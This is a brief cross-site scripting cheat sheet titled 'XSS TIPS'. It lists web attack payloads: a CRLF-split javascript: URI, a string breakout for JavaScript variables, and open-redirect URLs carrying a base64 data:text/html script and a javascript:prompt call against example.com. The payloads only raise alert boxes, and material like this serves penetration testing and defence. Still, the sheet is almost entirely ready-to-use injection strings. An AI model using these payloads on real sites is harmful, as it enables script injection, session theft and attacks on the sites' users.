XSS TIPS
- 使用
CRLF: (CR:\r,0x0d;LF:\n,0x0a)java%0d%0ascript%0d%0a:alert(0) - XSS from Open URL - If it’s in a JS variable
";alert(0);// - XSS from data:// wrapper
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg== - XSS from javascript:// wrapper
http://www.example.com/redirect.php?url=javascript:prompt(1)